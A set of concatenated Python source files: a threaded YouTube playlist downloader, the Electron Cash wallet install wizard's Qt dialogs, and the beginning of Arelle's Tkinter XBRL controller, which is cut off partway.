except BaseException as e:
return False, "error: " + str(e)
if out != tx_hash:
return False, "error: " + out
return True, out
|
multi-threads-DLVideo.py
|
# Python program to illustrate the concept
# of threading
# importing the threading module
import threading
import youtube_dl
import sys
import os
def task(string):
#print("download: {}".format(string))
print("downloading file {}: {}".format(count, string.strip()))
stringCommand = "videoYoutubeDL.py https://www.youtube.com/watch?v=" + string.strip()
print(stringCommand)
os.system(stringCommand)
if __name__ == "__main__":
print("Usage:")
print("python downloadPlayListYouTubeAudio.py playlist.txt")
print("A file called playlist.txt needed, to create this file, call playListYouTube.py")
print("Enjoy!")
filenames = sys.argv[1]
file1 = open(filenames, 'r')
count = 0
fileName = []
while True:
count += 1
line = file1.readline()
fileName.append(line)
if not line:
break
#print("downloading file {}: {}".format(count, line.strip()))
#stringCommand = "youtubeDL.py https://www.youtube.com/watch?v=" + line.strip()
#print(stringCommand)
#os.system(stringCommand)
file1.close()
# creating thread
t1 = []
RANGE = count
for x in range(RANGE):
t = threading.Thread(target=task, args=(fileName[x],))
t1.append(t)
for x in range(RANGE):
t1[x].start()
for x in range(RANGE):
t1[x].join()
# both threads completely executed
print("Done!")
|
installwizard.py
|
# -*- mode: python3 -*-
import os
import sys
import threading
import traceback
import weakref
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
from electroncash import Wallet, WalletStorage
from electroncash.util import UserCancelled, InvalidPassword, finalization_print_error
from electroncash.base_wizard import BaseWizard
from electroncash.i18n import _
from .seed_dialog import SeedLayout, KeysLayout
from .network_dialog import NetworkChoiceLayout
from .util import *
from .password_dialog import PasswordLayout, PW_NEW
from .bip38_importer import Bip38Importer
class GoBack(Exception):
pass
MSG_GENERATING_WAIT = _("Electron Cash is generating your addresses, please wait...")
MSG_ENTER_ANYTHING = _("Please enter a seed phrase, a master key, a list of "
"Bitcoin addresses, or a list of private keys")
MSG_ENTER_SEED_OR_MPK = _("Please enter a seed phrase or a master key (xpub or xprv):")
MSG_COSIGNER = _("Please enter the master public key of cosigner #{}:")
MSG_ENTER_PASSWORD = _("Choose a password to encrypt your wallet keys.") + '\n'\
+ _("Leave this field empty if you want to disable encryption.")
MSG_RESTORE_PASSPHRASE = \
_("Please enter your seed derivation passphrase. "
"Note: this is NOT your encryption password. "
"Leave this field empty if you did not use one or are unsure.")
class CosignWidget(QWidget):
size = 120
def __init__(self, m, n):
QWidget.__init__(self)
self.R = QRect(0, 0, self.size, self.size)
self.setGeometry(self.R)
self.setMinimumHeight(self.size)
self.setMaximumHeight(self.size)
self.m = m
self.n = n
def set_n(self, n):
self.n = n
self.update()
def set_m(self, m):
self.m = m
self.update()
def paintEvent(self, event):
bgcolor = self.palette().color(QPalette.Background)
pen = QPen(bgcolor, 7, Qt.SolidLine)
qp = QPainter()
qp.begin(self)
qp.setPen(pen)
qp.setRenderHint(QPainter.Antialiasing)
qp.setBrush(Qt.gray)
for i in range(self.n):
alpha = int(16* 360 * i/self.n)
alpha2 = int(16* 360 * 1/self.n)
qp.setBrush(Qt.green if i<self.m else Qt.gray)
qp.drawPie(self.R, alpha, alpha2)
qp.end()
def wizard_dialog(func):
def func_wrapper(*args, **kwargs):
run_next = kwargs['run_next']
wizard = args[0]
wizard.back_button.setText(_('Back') if wizard.can_go_back() else _('Cancel'))
try:
out = func(*args, **kwargs)
except GoBack:
wizard.go_back() if wizard.can_go_back() else wizard.close()
return
except UserCancelled:
return
if type(out) is not tuple:
out = (out,)
run_next(*out)
return func_wrapper
# WindowModalDialog must come first as it overrides show_error
class InstallWizard(QDialog, MessageBoxMixin, BaseWizard):
accept_signal = pyqtSignal()
synchronized_signal = pyqtSignal(str)
def __init__(self, config, app, plugins, storage):
BaseWizard.__init__(self, config, storage)
QDialog.__init__(self, None)
self.setWindowTitle('Electron Cash - ' + _('Install Wizard'))
self.app = app
self.config = config
# Set for base base class
self.plugins = plugins
self.setMinimumSize(600, 400)
self.accept_signal.connect(self.accept)
self.title = QLabel()
self.main_widget = QWidget()
self.back_button = QPushButton(_("Back"), self)
self.back_button.setText(_('Back') if self.can_go_back() else _('Cancel'))
self.next_button = QPushButton(_("Next"), self)
self.next_button.setDefault(True)
self.logo = QLabel()
self.please_wait = QLabel(_("Please wait..."))
self.please_wait.setAlignment(Qt.AlignCenter)
self.icon_filename = None
self.loop = QEventLoop()
self.rejected.connect(lambda: self.loop.exit(0))
self.back_button.clicked.connect(lambda: self.loop.exit(1))
self.next_button.clicked.connect(lambda: self.loop.exit(2))
outer_vbox = QVBoxLayout(self)
inner_vbox = QVBoxLayout()
inner_vbox.addWidget(self.title)
inner_vbox.addWidget(self.main_widget)
inner_vbox.addStretch(1)
inner_vbox.addWidget(self.please_wait)
inner_vbox.addStretch(1)
scroll_widget = QWidget()
scroll_widget.setLayout(inner_vbox)
scroll = QScrollArea()
scroll.setWidget(scroll_widget)
scroll.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
scroll.setWidgetResizable(True)
icon_vbox = QVBoxLayout()
icon_vbox.addWidget(self.logo)
icon_vbox.addStretch(1)
hbox = QHBoxLayout()
hbox.addLayout(icon_vbox)
hbox.addSpacing(5)
hbox.addWidget(scroll)
hbox.setStretchFactor(scroll, 1)
outer_vbox.addLayout(hbox)
outer_vbox.addLayout(Buttons(self.back_button, self.next_button))
self.set_icon(':icons/electron-cash.svg')
self.show()
self.raise_()
# Track object lifecycle
finalization_print_error(self)
def run_and_get_wallet(self):
vbox = QVBoxLayout()
hbox = QHBoxLayout()
hbox.addWidget(QLabel(_('Wallet') + ':'))
self.name_e = QLineEdit()
hbox.addWidget(self.name_e)
button = QPushButton(_('Choose...'))
hbox.addWidget(button)
vbox.addLayout(hbox)
self.msg_label = QLabel('')
vbox.addWidget(self.msg_label)
hbox2 = QHBoxLayout()
self.pw_e = QLineEdit('', self)
self.pw_e.setFixedWidth(150)
self.pw_e.setEchoMode(2)
self.pw_label = QLabel(_('Password') + ':')
hbox2.addWidget(self.pw_label)
hbox2.addWidget(self.pw_e)
hbox2.addStretch()
vbox.addLayout(hbox2)
self.set_layout(vbox, title=_('Electron Cash wallet'))
wallet_folder = os.path.dirname(self.storage.path)
def on_choose():
path, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if path:
self.name_e.setText(path)
def on_filename(filename):
path = os.path.join(wallet_folder, filename)
try:
self.storage = WalletStorage(path, manual_upgrades=True)
self.next_button.setEnabled(True)
except IOError:
self.storage = None
self.next_button.setEnabled(False)
if self.storage:
if not self.storage.file_exists():
msg =_("This file does not exist.") + '\n' \
+ _("Press 'Next' to create this wallet, or choose another file.")
pw = False
elif self.storage.file_exists() and self.storage.is_encrypted():
msg = _("This file is encrypted.") + '\n' + _('Enter your password or choose another file.')
pw = True
else:
msg = _("Press 'Next' to open this wallet.")
pw = False
else:
msg = _('Cannot read file')
pw = False
self.msg_label.setText(msg)
if pw:
self.pw_label.show()
self.pw_e.show()
self.pw_e.setFocus()
else:
self.pw_label.hide()
self.pw_e.hide()
button.clicked.connect(on_choose)
self.name_e.textChanged.connect(on_filename)
n = os.path.basename(self.storage.path)
self.name_e.setText(n)
while True:
password = None
if self.storage.file_exists() and not self.storage.is_encrypted():
break
if self.loop.exec_() != 2: # 2 = next
return
if not self.storage.file_exists():
break
if self.storage.file_exists() and self.storage.is_encrypted():
password = self.pw_e.text()
try:
self.storage.decrypt(password)
break
except InvalidPassword as e:
QMessageBox.information(None, _('Error'), str(e))
continue
except BaseException as e:
traceback.print_exc(file=sys.stdout)
QMessageBox.information(None, _('Error'), str(e))
return
path = self.storage.path
if self.storage.requires_split():
self.hide()
msg = _("The wallet '{}' contains multiple accounts, which are no longer supported since Electrum 2.7.\n\n"
"Do you want to split your wallet into multiple files?").format(path)
if not self.question(msg):
return
file_list = '\n'.join(self.storage.split_accounts())
msg = _('Your accounts have been moved to') + ':\n' + file_list + '\n\n'+ _('Do you want to delete the old file') + ':\n' + path
if self.question(msg):
os.remove(path)
self.show_warning(_('The file was removed'))
return
if self.storage.requires_upgrade():
self.hide()
msg = _("The format of your wallet '%s' must be upgraded for Electron Cash. This change will not be backward compatible"%path)
if not self.question(msg):
return
self.storage.upgrade()
self.wallet = Wallet(self.storage)
return self.wallet, password
action = self.storage.get_action()
if action and action != 'new':
self.hide()
msg = _("The file '{}' contains an incompletely created wallet.\n"
"Do you want to complete its creation now?").format(path)
if not self.question(msg):
if self.question(_("Do you want to delete '{}'?").format(path)):
os.remove(path)
self.show_warning(_('The file was removed'))
return
self.show()
if action:
# self.wallet is set in run
self.run(action)
return self.wallet, password
self.wallet = Wallet(self.storage)
return self.wallet, password
def finished(self):
"""Called in hardware client wrapper, in order to close popups."""
return
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
traceback.print_exception(*exc_info)
self.show_error(str(exc_info[1]))
def set_icon(self, filename):
prior_filename, self.icon_filename = self.icon_filename, filename
self.logo.setPixmap(QIcon(filename).pixmap(60))
return prior_filename
def set_layout(self, layout, title=None, next_enabled=True):
self.title.setText("<b>%s</b>"%title if title else "")
self.title.setVisible(bool(title))
# Get rid of any prior layout by assigning it to a temporary widget
prior_layout = self.main_widget.layout()
if prior_layout:
QWidget().setLayout(prior_layout)
self.main_widget.setLayout(layout)
self.back_button.setEnabled(True)
self.next_button.setEnabled(next_enabled)
if next_enabled:
self.next_button.setFocus()
self.main_widget.setVisible(True)
self.please_wait.setVisible(False)
def exec_layout(self, layout, title=None, raise_on_cancel=True,
next_enabled=True):
self.set_layout(layout, title, next_enabled)
result = self.loop.exec_()
if not result and raise_on_cancel:
raise UserCancelled
if result == 1:
raise GoBack
self.title.setVisible(False)
self.back_button.setEnabled(False)
self.next_button.setEnabled(False)
self.main_widget.setVisible(False)
self.please_wait.setVisible(True)
self.refresh_gui()
return result
def refresh_gui(self):
# For some reason, to refresh the GUI this needs to be called twice
self.app.processEvents()
self.app.processEvents()
def remove_from_recently_open(self, filename):
self.config.remove_from_recently_open(filename)
def text_input(self, title, message, is_valid, allow_multi=False):
slayout = KeysLayout(parent=self, title=message, is_valid=is_valid,
allow_multi=allow_multi)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_text()
def seed_input(self, title, message, is_seed, options):
slayout = SeedLayout(title=message, is_seed=is_seed, options=options, parent=self, editable=True)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_seed(), slayout.is_bip39, slayout.is_ext
def bip38_prompt_for_pw(self, bip38_keys):
''' Reimplemented from basewizard superclass. Expected to return the pw
dict or None. '''
d = Bip38Importer(bip38_keys, parent=self.top_level_window())
res = d.exec_()
d.setParent(None) # python GC quicker if this happens
return d.decoded_keys # dict will be empty if user cancelled
@wizard_dialog
def add_xpub_dialog(self, title, message, is_valid, run_next, allow_multi=False):
return self.text_input(title, message, is_valid, allow_multi)
@wizard_dialog
def add_cosigner_dialog(self, run_next, index, is_valid):
title = _("Add Cosigner") + " %d"%index
message = ' '.join([
_('Please enter the master public key (xpub) of your cosigner.'),
_('Enter their master private key (xprv) if you want to be able to sign for them.')
])
return self.text_input(title, message, is_valid)
@wizard_dialog
def restore_seed_dialog(self, run_next, test):
options = []
if self.opt_ext:
options.append('ext')
if self.opt_bip39:
options.append('bip39')
title = _('Enter Seed')
message = _('Please enter your seed phrase in order to restore your wallet.')
return self.seed_input(title, message, test, options)
@wizard_dialog
def confirm_seed_dialog(self, run_next, test):
self.app.clipboard().clear()
title = _('Confirm Seed')
message = ' '.join([
_('Your seed is important!'),
_('If you lose your seed, your money will be permanently lost.'),
_('To make sure that you have properly saved your seed, please retype it here.')
])
seed, is_bip39, is_ext = self.seed_input(title, message, test, None)
return seed
@wizard_dialog
def show_seed_dialog(self, run_next, seed_text, editable=True):
title = _("Your wallet generation seed is:")
slayout = SeedLayout(seed=seed_text, title=title, msg=True, options=['ext'], editable=False)
self.exec_layout(slayout)
return slayout.is_ext
def pw_layout(self, msg, kind):
playout = PasswordLayout(None, msg, kind, self.next_button)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.new_password(), playout.encrypt_cb.isChecked()
@wizard_dialog
def request_password(self, run_next):
"""Request the user enter a new password and confirm it. Return
the password or None for no password. Note that this dialog screen
cannot go back, and instead the user can only cancel."""
return self.pw_layout(MSG_ENTER_PASSWORD, PW_NEW)
def _add_extra_button_to_layout(self, extra_button, layout):
if (not isinstance(extra_button, (list, tuple))
or not len(extra_button) == 2):
return
but_title, but_action = extra_button
hbox = QHBoxLayout()
hbox.setContentsMargins(12,24,12,12)
but = QPushButton(but_title)
hbox.addStretch(1)
hbox.addWidget(but)
layout.addLayout(hbox)
but.clicked.connect(but_action)
@wizard_dialog
def confirm_dialog(self, title, message, run_next, extra_button=None):
self.confirm(message, title, extra_button=extra_button)
def confirm(self, message, title, extra_button=None):
label = WWLabel(message)
textInteractionFlags = (Qt.LinksAccessibleByMouse
| Qt.TextSelectableByMouse
| Qt.TextSelectableByKeyboard
| Qt.LinksAccessibleByKeyboard)
label.setTextInteractionFlags(textInteractionFlags)
label.setOpenExternalLinks(True)
vbox = QVBoxLayout()
vbox.addWidget(label)
if extra_button:
self._add_extra_button_to_layout(extra_button, vbox)
self.exec_layout(vbox, title)
@wizard_dialog
def action_dialog(self, action, run_next):
self.run(action)
def terminate(self):
self.accept_signal.emit()
def waiting_dialog(self, task, msg):
self.please_wait.setText(MSG_GENERATING_WAIT)
self.refresh_gui()
t = threading.Thread(target = task)
t.start()
t.join()
@wizard_dialog
def choice_dialog(self, title, message, choices, run_next, extra_button=None):
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
clayout = ChoicesLayout(message, c_titles)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
if extra_button:
self._add_extra_button_to_layout(extra_button, vbox)
self.exec_layout(vbox, title)
action = c_values[clayout.selected_index()]
return action
def query_choice(self, msg, choices):
"""called by hardware wallets"""
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, '')
return clayout.selected_index()
@wizard_dialog
def line_dialog(self, run_next, title, message, default, test, warning=''):
vbox = QVBoxLayout()
vbox.addWidget(WWLabel(message))
line = QLineEdit()
line.setText(default)
def f(text):
self.next_button.setEnabled(test(text))
line.textEdited.connect(f)
vbox.addWidget(line)
vbox.addWidget(WWLabel(warning))
self.exec_layout(vbox, title, next_enabled=test(default))
return ' '.join(line.text().split())
@wizard_dialog
def show_xpub_dialog(self, xpub, run_next):
msg = ' '.join([
_("Here is your master public key."),
_("Please share it with your cosigners.")
])
vbox = QVBoxLayout()
layout = SeedLayout(xpub, title=msg, icon=False)
vbox.addLayout(layout.layout())
self.exec_layout(vbox, _('Master Public Key'))
return None
def init_network(self, network):
message = _("Electron Cash communicates with remote servers to get "
"information about your transactions and addresses. The "
"servers all fulfil the same purpose only differing in "
"hardware. In most cases you simply want to let Electron Cash "
"pick one at random. However if you prefer feel free to "
"select a server manually.")
choices = [_("Auto connect"), _("Select server manually")]
title = _("How do you want to connect to a server? ")
clayout = ChoicesLayout(message, choices)
self.back_button.setText(_('Cancel'))
self.exec_layout(clayout.layout(), title)
r = clayout.selected_index()
network.auto_connect = (r == 0)
self.config.set_key('auto_connect', network.auto_connect, True)
if r == 1:
nlayout = NetworkChoiceLayout(self, network, self.config, wizard=True)
if self.exec_layout(nlayout.layout()):
nlayout.accept()
@wizard_dialog
def multisig_dialog(self, run_next):
cw = CosignWidget(2, 2)
m_edit = QSlider(Qt.Horizontal, self)
n_edit = QSlider(Qt.Horizontal, self)
n_edit.setMinimum(1)
n_edit.setMaximum(15)
m_edit.setMinimum(1)
m_edit.setMaximum(2)
n_edit.setValue(2)
m_edit.setValue(2)
n_label = QLabel()
m_label = QLabel()
grid = QGridLayout()
grid.addWidget(n_label, 0, 0)
grid.addWidget(n_edit, 0, 1)
grid.addWidget(m_label, 1, 0)
grid.addWidget(m_edit, 1, 1)
def on_m(m):
m_label.setText(_('Require %d signatures')%m)
cw.set_m(m)
def on_n(n):
n_label.setText(_('From %d cosigners')%n)
cw.set_n(n)
m_edit.setMaximum(n)
n_edit.valueChanged.connect(on_n)
m_edit.valueChanged.connect(on_m)
on_n(2)
on_m(2)
vbox = QVBoxLayout()
vbox.addWidget(cw)
vbox.addWidget(WWLabel(_("Choose the number of signatures needed to unlock funds in your wallet:")))
vbox.addLayout(grid)
self.exec_layout(vbox, _("Multi-Signature Wallet"))
m = int(m_edit.value())
n = int(n_edit.value())
return (m, n)
linux_hw_wallet_support_dialog = None
def on_hw_wallet_support(self):
''' Overrides base wizard's noop impl. '''
if sys.platform.startswith("linux"):
if self.linux_hw_wallet_support_dialog:
self.linux_hw_wallet_support_dialog.raise_()
return
# NB: this should only be imported from Linux
from . import udev_installer
self.linux_hw_wallet_support_dialog = udev_installer.InstallHardwareWalletSupportDialog(self.top_level_window(), self.plugins)
self.linux_hw_wallet_support_dialog.exec_()
self.linux_hw_wallet_support_dialog.setParent(None)
self.linux_hw_wallet_support_dialog = None
else:
self.show_error("Linux only facility. FIXME!")
def showEvent(self, event):
ret = super().showEvent(event)
from electroncash import networks
if networks.net is networks.TaxCoinNet and not self.config.get("have_shown_taxcoin_dialog"):
self.config.set_key("have_shown_taxcoin_dialog", True)
weakSelf = weakref.ref(self)
def do_dialog():
slf = weakSelf()
if not slf:
return
QMessageBox.information(slf, _("Electron Cash - Tax Coin"),
_("For TaxCoin, your existing wallet files and configuration have "
"been duplicated in the subdirectory taxcoin/ within your Electron Cash "
"directory.\n\n"
"To use TaxCoin, you should select a server manually, and then choose one of "
"the starred servers.\n\n"
"After selecting a server, select a wallet file to open."))
QTimer.singleShot(10, do_dialog)
return ret
|
CntlrWinMain.py
|
'''
Created on Oct 3, 2010
This module is Arelle's controller in windowing interactive UI mode
@author: Mark V Systems Limited
(c) Copyright 2010 Mark V Systems Limited, All rights reserved.
'''
from arelle import PythonUtil # define 2.x or 3.x string types
import os, sys, subprocess, pickle, time, locale, re, os.path
from tkinter import (Tk, TclError, Toplevel, Menu, PhotoImage, StringVar, BooleanVar, N, S, E, W, EW,
HORIZONTAL, VERTICAL, END, font as tkFont)
try:
from tkinter.ttk import Frame, Button, Label, Combobox, Separator, PanedWindow, Notebook
except ImportError: # 3.0 versions of tkinter
from ttk import Frame, Button, Label, Combobox, Separator, PanedWindow, Notebook
import tkinter.tix
import tkinter.filedialog
import tkinter.messagebox, traceback
from arelle.Locale import format_string
from arelle.CntlrWinTooltip import ToolTip
from arelle import XbrlConst
from arelle.PluginManager import pluginClassMethods
from arelle.UrlUtil import isHttpUrl
import logging
import threading, queue
from arelle import Cntlr
from arelle import (DialogURL, DialogLanguage,
DialogPluginManager, DialogPackageManager,
ModelDocument,
ModelManager,
PackageManager,
RenderingEvaluator,
TableStructure,
ViewWinDTS,
ViewWinProperties, ViewWinConcepts, ViewWinRelationshipSet, ViewWinFormulae,
ViewWinFactList, ViewWinFactTable, ViewWinRenderedGrid, ViewWinXml,
ViewWinRoleTypes, ViewFileRoleTypes, ViewFileConcepts,
ViewWinTests, ViewWinTree, ViewWinVersReport, ViewWinRssFeed,
ViewFileTests,
ViewFileRenderedGrid,
ViewFileRelationshipSet,
Updater
)
from arelle.ModelFormulaObject import FormulaOptions
from arelle.FileSource import openFileSource
restartMain = True
readCommandLineArguments = True
class CntlrWinMain (Cntlr.Cntlr):
def __init__(self, parent):
super(CntlrWinMain, self).__init__(hasGui=True)
self.fileHistorySize = 20
self.parent = parent
self.filename = None
self.dirty = False
overrideLang = self.config.get("labelLangOverride")
self.labelLang = overrideLang if overrideLang else self.modelManager.defaultLang
self.data = {}
if self.isMac: # mac Python fonts bigger than other apps (terminal, text edit, Word), and to windows Arelle
_defaultFont = tkFont.nametofont("TkDefaultFont") # label, status bar, treegrid
_defaultFont.configure(size=11)
_textFont = tkFont.nametofont("TkTextFont") # entry widget and combobox entry field
_textFont.configure(size=11)
#parent.option_add("*Font", _defaultFont) # would be needed if not using defaulted font
toolbarButtonPadding = 1
else:
toolbarButtonPadding = 4
tkinter.CallWrapper = TkinterCallWrapper
imgpath = self.imagesDir + os.sep
if self.isMSW:
icon = imgpath + "arelle.ico"
parent.iconbitmap(icon, default=icon)
#image = PhotoImage(file=path + "arelle32.gif")
#label = Label(None, image=image)
#parent.iconwindow(label)
else:
parent.iconbitmap("@" + imgpath + "arelle.xbm")
# try with gif file
#parent.iconbitmap(path + "arelle.gif")
self.menubar = Menu(self.parent)
self.parent["menu"] = self.menubar
self.fileMenu = Menu(self.menubar, tearoff=0)
self.fileMenuLength = 1
for label, command, shortcut_text, shortcut in (
#(_("New..."), self.fileNew, "Ctrl+N", "<Control-n>"),
(_("Open File..."), self.fileOpen, "Ctrl+O", "<Control-o>"),
(_("Open Web..."), self.webOpen, "Shift+Alt+O", "<Shift-Alt-o>"),
(_("Import File..."), self.importFileOpen, None, None),
(_("Import Web..."), self.importWebOpen, None, None),
("PLUG-IN", "CntlrWinMain.Menu.File.Open", None, None),
(_("Save"), self.fileSaveExistingFile, "Ctrl+S", "<Control-s>"),
(_("Save As..."), self.fileSave, None, None),
(_("Save DTS Package"), self.saveDTSpackage, None, None),
("PLUG-IN", "CntlrWinMain.Menu.File.Save", None, None),
(_("Close"), self.fileClose, "Ctrl+W", "<Control-w>"),
(None, None, None, None),
(_("Quit"), self.quit, "Ctrl+Q", "<Control-q>"),
#(_("Restart"), self.restart, None, None),
(None, None, None, None),
("",None,None,None) # position for file history
):
if label is None:
self.fileMenu.add_separator()
elif label == "PLUG-IN":
for pluginMenuExtender in pluginClassMethods(command):
pluginMenuExtender(self, self.fileMenu)
self.fileMenuLength += 1
else:
self.fileMenu.add_command(label=label, underline=0, command=command, accelerator=shortcut_text)
self.parent.bind(shortcut, command)
self.fileMenuLength += 1
self.loadFileMenuHistory()
self.menubar.add_cascade(label=_("File"), menu=self.fileMenu, underline=0)
toolsMenu = Menu(self.menubar, tearoff=0)
# This menu item triggers the default option which is not to use the factindex sqlite DB
# (temporarily removed)
#toolsMenu.add_checkbutton(label=_("Use FactIndex"), underline=0, command=self.useFactIndexCheckUncheck)
validateMenu = Menu(self.menubar, tearoff=0)
toolsMenu.add_cascade(label=_("Validation"), menu=validateMenu, underline=0)
validateMenu.add_command(label=_("Validate"), underline=0, command=self.validate)
self.modelManager.validateDisclosureSystem = self.config.setdefault("validateDisclosureSystem",False)
self.validateDisclosureSystem = BooleanVar(value=self.modelManager.validateDisclosureSystem)
self.validateDisclosureSystem.trace("w", self.setValidateDisclosureSystem)
validateMenu.add_checkbutton(label=_("Disclosure system checks"), underline=0, variable=self.validateDisclosureSystem, onvalue=True, offvalue=False)
validateMenu.add_command(label=_("Select disclosure system..."), underline=0, command=self.selectDisclosureSystem)
self.modelManager.validateCalcLB = self.config.setdefault("validateCalcLB",False)
self.validateCalcLB = BooleanVar(value=self.modelManager.validateCalcLB)
self.validateCalcLB.trace("w", self.setValidateCalcLB)
validateMenu.add_checkbutton(label=_("Calc Linkbase checks"), underline=0, variable=self.validateCalcLB, onvalue=True, offvalue=False)
self.modelManager.validateInferDecimals = self.config.setdefault("validateInferDecimals",False)
self.validateInferDecimals = BooleanVar(value=self.modelManager.validateInferDecimals)
self.validateInferDecimals.trace("w", self.setValidateInferDecimals)
validateMenu.add_checkbutton(label=_("Infer Decimals in calculations"), underline=0, variable=self.validateInferDecimals, onvalue=True, offvalue=False)
self.modelManager.validateUtr = self.config.setdefault("validateUtr",True)
self.validateUtr = BooleanVar(value=self.modelManager.validateUtr)
self.validateUtr.trace("w", self.setValidateUtr)
validateMenu.add_checkbutton(label=_("Unit Type Registry validation"), underline=0, variable=self.validateUtr, onvalue=True, offvalue=False)
for pluginMenuExtender in pluginClassMethods("CntlrWinMain.Menu.Validation"):
pluginMenuExtender(self, validateMenu)
formulaMenu = Menu(self.menubar, tearoff=0)
formulaMenu.add_command(label=_("Parameters..."), underline=0, command=self.formulaParametersDialog)
formulaMenu.add_command(label=_("Active formula..."), underline=0, command=self.activeFormulaDialog)
toolsMenu.add_cascade(label=_("Formula"), menu=formulaMenu, underline=0)
self.modelManager.formulaOptions = FormulaOptions(self.config.get("formulaParameters"))
toolsMenu.add_command(label=_("Compare DTSes..."), underline=0, command=self.compareDTSes)
cacheMenu = Menu(self.menubar, tearoff=0)
rssWatchMenu = Menu(self.menubar, tearoff=0)
rssWatchMenu.add_command(label=_("Options..."), underline=0, command=self.rssWatchOptionsDialog)
rssWatchMenu.add_command(label=_("Start"), underline=0, command=lambda: self.rssWatchControl(start=True))
rssWatchMenu.add_command(label=_("Stop"), underline=0, command=lambda: self.rssWatchControl(stop=True))
toolsMenu.add_cascade(label=_("RSS Watch"), menu=rssWatchMenu, underline=0)
self.modelManager.rssWatchOptions = self.config.setdefault("rssWatchOptions", {})
toolsMenu.add_cascade(label=_("Internet"), menu=cacheMenu, underline=0)
self.webCache.workOffline = self.config.setdefault("workOffline",False)
self.workOffline = BooleanVar(value=self.webCache.workOffline)
self.workOffline.trace("w", self.setWorkOffline)
cacheMenu.add_checkbutton(label=_("Work offline"), underline=0, variable=self.workOffline, onvalue=True, offvalue=False)
'''
self.webCache.recheck = self.config.setdefault("webRecheck",False)
self.webRecheck = BooleanVar(value=self.webCache.webRecheck)
self.webRecheck.trace("w", self.setWebRecheck)
cacheMenu.add_checkbutton(label=_("Recheck file dates weekly"), underline=0, variable=self.workOffline, onvalue=True, offvalue=False)
self.webCache.notify = self.config.setdefault("",False)
self.downloadNotify = BooleanVar(value=self.webCache.retrievalNotify)
self.downloadNotify.trace("w", self.setRetrievalNotify)
cacheMenu.add_checkbutton(label=_("Notify file downloads"), underline=0, variable=self.workOffline, onvalue=True, offvalue=False)
'''
cacheMenu.add_command(label=_("Clear cache"), underline=0, command=self.confirmClearWebCache)
cacheMenu.add_command(label=_("Manage cache"), underline=0, command=self.manageWebCache)
cacheMenu.add_command(label=_("Proxy Server"), underline=0, command=self.setupProxy)
logmsgMenu = Menu(self.menubar, tearoff=0)
toolsMenu.add_cascade(label=_("Messages log"), menu=logmsgMenu, underline=0)
logmsgMenu.add_command(label=_("Clear"), underline=0, command=self.logClear)
logmsgMenu.add_command(label=_("Save to file"), underline=0, command=self.logSaveToFile)
self.modelManager.collectProfileStats = self.config.setdefault("collectProfileStats",False)
self.collectProfileStats = BooleanVar(value=self.modelManager.collectProfileStats)
self.collectProfileStats.trace("w", self.setCollectProfileStats)
logmsgMenu.add_checkbutton(label=_("Collect profile stats"), underline=0, variable=self.collectProfileStats, onvalue=True, offvalue=False)
logmsgMenu.add_command(label=_("Log profile stats"), underline=0, command=self.showProfileStats)
logmsgMenu.add_command(label=_("Clear profile stats"), underline=0, command=self.clearProfileStats)
toolsMenu.add_command(label=_("Language..."), underline=0, command=lambda: DialogLanguage.askLanguage(self))
for pluginMenuExtender in pluginClassMethods("CntlrWinMain.Menu.Tools"):
pluginMenuExtender(self, toolsMenu)
self.menubar.add_cascade(label=_("Tools"), menu=toolsMenu, underline=0)
helpMenu = Menu(self.menubar, tearoff=0)
for label, command, shortcut_text, shortcut in (
(_("Check for updates"), lambda: Updater.checkForUpdates(self), None, None),
(_("Manage plug-ins"), lambda: DialogPluginManager.dialogPluginManager(self), None, None),
(_("Manage packages"), lambda: DialogPackageManager.dialogPackageManager(self), None, None),
("PLUG-IN", "CntlrWinMain.Menu.Help.Upper", None, None),
(None, None, None, None),
(_("About..."), self.helpAbout, None, None),
("PLUG-IN", "CntlrWinMain.Menu.Help.Lower", None, None),
):
if label is None:
helpMenu.add_separator()
elif label == "PLUG-IN":
for pluginMenuExtender in pluginClassMethods(command):
pluginMenuExtender(self, helpMenu)
else:
helpMenu.add_command(label=label, underline=0, command=command, accelerator=shortcut_text)
self.parent.bind(shortcut, command)
for pluginMenuExtender in pluginClassMethods("CntlrWinMain.Menu.Help"):
pluginMenuExtender(self, toolsMenu)
self.menubar.add_cascade(label=_("Help"), menu=helpMenu, underline=0)
windowFrame = Frame(self.parent)
self.statusbar = Label(windowFrame, text=_("Ready..."), anchor=W)
self.statusbarTimerId = self.statusbar.after(5000, self.uiClearStatusTimerEvent)
self.statusbar.grid(row=2, column=0, columnspan=2, sticky=EW)
#self.balloon = tkinter.tix.Balloon(windowFrame, statusbar=self.statusbar)
self.toolbar_images = []
toolbar = Frame(windowFrame)
menubarColumn = 0
self.validateTooltipText = StringVar()
for image, command, toolTip, statusMsg in (
#("images/toolbarNewFile.gif", self.fileNew),
("toolbarOpenFile.gif", self.fileOpen, _("Open local file"), _("Open by choosing a local XBRL file, testcase, or archive file")),
("toolbarOpenWeb.gif", self.webOpen, _("Open web file"), _("Enter an http:// URL of an XBRL file or testcase")),
("toolbarSaveFile.gif", self.fileSaveExistingFile, _("Save file"), _("Saves currently selected local XBRL file")),
("toolbarClose.gif", self.fileClose, _("Close"), _("Closes currently selected instance/DTS or testcase(s)")),
(None,None,None,None),
("toolbarFindMenu.gif", self.find, _("Find"), _("Find dialog for scope and method of searching")),
(None,None,None,None),
("toolbarValidate.gif", self.validate, self.validateTooltipText, _("Validate currently selected DTS or testcase(s)")),
("toolbarCompare.gif", self.compareDTSes, _("Compare DTSes"), _("compare two DTSes")),
(None,None,None,None),
("toolbarLogClear.gif", self.logClear, _("Messages Log | Clear"), _("Clears the messages log")),
#(Combobox(toolbar, textvariable=self.findVar, values=self.findValues,
# ), self.logClear, _("Find options"), _("Select of find options")),
):
tbControl = None
if command is None:
tbControl = Separator(toolbar, orient=VERTICAL)
tbControl.grid(row=0, column=menubarColumn, padx=6)
elif isinstance(image, Combobox):
tbControl = image
tbControl.grid(row=0, column=menubarColumn)
else:
image = os.path.join(self.imagesDir, image)
try:
image = PhotoImage(file=image)
